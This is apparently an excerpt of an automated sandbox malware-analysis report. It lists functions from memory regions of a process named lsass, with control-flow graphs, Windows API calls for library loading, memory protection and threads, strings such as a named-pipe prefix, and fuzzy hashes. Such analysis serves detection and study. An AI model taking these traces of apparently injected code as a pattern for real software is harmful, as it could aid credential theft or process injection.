                                                        control_flow_graph 501 202c0ae9930-202c0ae996e 502 202c0ae9a5f 501->502 503 202c0ae9974-202c0ae9977 501->503 504 202c0ae9a61-202c0ae9a7d 502->504 503->504 505 202c0ae997d 503->505 506 202c0ae9980 505->506 507 202c0ae9986-202c0ae9995 506->507 508 202c0ae9a57 506->508 509 202c0ae9997-202c0ae999a 507->509 510 202c0ae99a2-202c0ae99c1 LoadLibraryExW 507->510 508->502 511 202c0ae99a0 509->511 512 202c0ae9a39-202c0ae9a48 GetProcAddress 509->512 513 202c0ae9a19-202c0ae9a2e 510->513 514 202c0ae99c3-202c0ae99cc GetLastError 510->514 517 202c0ae9a0d-202c0ae9a14 511->517 512->508 516 202c0ae9a4a-202c0ae9a55 512->516 513->512 515 202c0ae9a30-202c0ae9a33 FreeLibrary 513->515 518 202c0ae99ce-202c0ae99e3 call 202c0aeae48 514->518 519 202c0ae99fb-202c0ae9a05 514->519 515->512 516->504 517->506 518->519 522 202c0ae99e5-202c0ae99f9 LoadLibraryExW 518->522 519->517 522->513 522->519
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AE9AEF,?,?,?,00000202C0AE98B4,?,?,?,?,00000202C0AE94A5), ref: 00000202C0AE99B5
                                                        • GetLastError.KERNEL32(?,?,?,00000202C0AE9AEF,?,?,?,00000202C0AE98B4,?,?,?,?,00000202C0AE94A5), ref: 00000202C0AE99C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AE9AEF,?,?,?,00000202C0AE98B4,?,?,?,?,00000202C0AE94A5), ref: 00000202C0AE99ED
                                                        • FreeLibrary.KERNEL32(?,?,?,00000202C0AE9AEF,?,?,?,00000202C0AE98B4,?,?,?,?,00000202C0AE94A5), ref: 00000202C0AE9A33
                                                        • GetProcAddress.KERNEL32(?,?,?,00000202C0AE9AEF,?,?,?,00000202C0AE98B4,?,?,?,?,00000202C0AE94A5), ref: 00000202C0AE9A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction ID: 5e283500570488e04c11cb878111f1f066800e919eaf2867852106ef62d998fd
                                                        • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction Fuzzy Hash: E4318232312BD0D5FE259B42A88C79D6398BB48BA4F5B06279FBD07392DF38C4598344
                                                        Function 00000202C0AF1CBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction ID: 7184855c9ba3123739d4c1803593c33873a5b36bf7853ab8baaa2b632e61460b
                                                        • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction Fuzzy Hash: 5C115B23214B40C6FB508B52E88C31D66A0F788FE4F054227EB5E87BA6CF7AC9088744
                                                        Function 00000202C0AE5F50 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction ID: 19b96c905ce15dbbc11c4f9e85588ff0474626fa4001dbc68910037396f6a183
                                                        • Opcode Fuzzy Hash: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction Fuzzy Hash: 06D19836208B88C6EA719B1AE49835E77A4F3C8B84F110617EBDD47BA6CF39C555CB00
                                                        Function 00000202C0AE31C0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: 49f91a8f98d666937e78668de082471fcace1b9a6d33b7a4ae6b4ef7563b3861
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: A9319023709B91C2FB51DF56A48C3AD63A0FB64B80F4681279FD807B56EB38D4B98700
                                                        Function 00000202C0AE1934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: c17ddeaabe1f8f50f5cc960665fa38cc4ef3ef8d2e66d3e5323e524351bba4bc
                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: A3010522708B8086FB14DB12A89C75D62A1F788FC0F498537DF994375ADE39C98A8744
                                                        Function 00000202C0AE3B00 Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction ID: e2b0fc35fde1784bee44412e6aa0ab7fc65bca9c338fcce3b87b088b7d59a9e4
                                                        • Opcode Fuzzy Hash: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction Fuzzy Hash: 59111727205B80D6FB249B21E88CB1E63A1AB48B45F060827DB9E46766EF3EC55C8700
                                                        Function 00000202C0AE330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction ID: 524019c9c190f4085ef242774ac6f67ce51e0351dd4b4719c5f329e12e39d64b
                                                        • Opcode Fuzzy Hash: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction Fuzzy Hash: 2CF0A763308B80D1FB109B13B98C15DA224EB58FD0F098133DF9A0BB2ACE3DC4998300
                                                        Function 00000202C0AEA258 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: 8091200d2c4dae040897235056f41ec68d4ed09c36f7d4f29a797052f8d23726
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: DFF05863325B40C2FF459F60E8CC3AC2360AB98B80F4A141B975B86262CF3AC49CC300
                                                        Function 00000202C0AE54F0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction ID: a272b08cb90abcf02a2fc86bcceb2c100b51d762f3ed6657aeb5cb6e22d7e5ba
                                                        • Opcode Fuzzy Hash: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction Fuzzy Hash: 5E02B732219BC4C6EB608B59F49835EB7A1F385794F114117EBDE87BAADB78C458CB00
                                                        Function 00000202C0AF0980 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00000202C0AF09C2
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000202C0AF093F,?,?,?,00000202C0AEE263), ref: 00000202C0AF0A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000202C0AF093F,?,?,?,00000202C0AEE263), ref: 00000202C0AF0B0A
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: d1872c561c705f38e9229c3beeaaf80fd6878b7c1775d027ea7d44530a41b64b
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: 3581DF33610751C9FB60AB6688CCBAD67A1F344B98F464217DF4A67793DB36884AC710
                                                        Function 00000202C0AE5B30 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction ID: d0846778c9f8455aee169a2047bb21eb6bacd067c0f715569a147f0904d3a7df
                                                        • Opcode Fuzzy Hash: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction Fuzzy Hash: 8A61B736518B84C6FA609B15F49C31E77A1F388784F114217EBDE87BAADB78C558CB04
                                                        Function 00000202C0AC13D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000003.1777918856.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_3_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 4d152d9eb979de7358603b4530df522b93ab3919d7d759988337ce92c9f54e9e
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 3211E5B6B50F10C1FB6C1228E6DE3AD10406B97F78F5B0627EB77073D79A1A894D9200
                                                        Function 00000202C0AF1FD8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 6188f325b3ff6b650061d398d5b13b7a07f1c032209b097b93437b946017f880
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 26113023A54B0182F7682629E5EF36D55406B55374F1A4637AF761B7E78E2A8C8BC300
                                                        Function 00000202C0AE3BB8 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: 236923577d5aa15d6a4631904870ee2daaea5dc695f84c81897f3291c1047b0a
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: 8A112A27708780D2FB249B25E48C66D6260F788F94F050027DF9D47795EE3EC55C8700
                                                        Function 00000202C0AE3558 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        • API String ID: 517849248-4147670505
                                                        • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction ID: 2ae334772e38c68e7382a6be4194bc35f8502ba406b3a2429c7b105d830b93b4
                                                        • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction Fuzzy Hash: 82114227308781E1FB209735E89D39E53A0F794740F5640239FA983796EF29C92DCB40
                                                        Function 00000202C0AE14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction ID: 3b65aacb3217f76a4f1f48ad1aa66b7197232698b528f185b9e9419ea648dc4a
                                                        • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction Fuzzy Hash: 85012533605B90C6EB44DFA6A88C15D67A0F788F80F0A4526EB9A4372ADF38C0598744
                                                        Function 00000202C0ABD178 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000003.1777918856.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_3_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        • API String ID: 3215553584-4137334423
                                                        • Opcode ID: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction ID: bfa7b9923ac52f3c8539521844de462a00e263f76baf048c72ac69bf02513b50
                                                        • Opcode Fuzzy Hash: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction Fuzzy Hash: F561A132604784C2FEA99B19A1DC3AD6BE4F741784F174567DB0A1B7A3EB79C88D8301
                                                        Function 00000202C0AE2408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
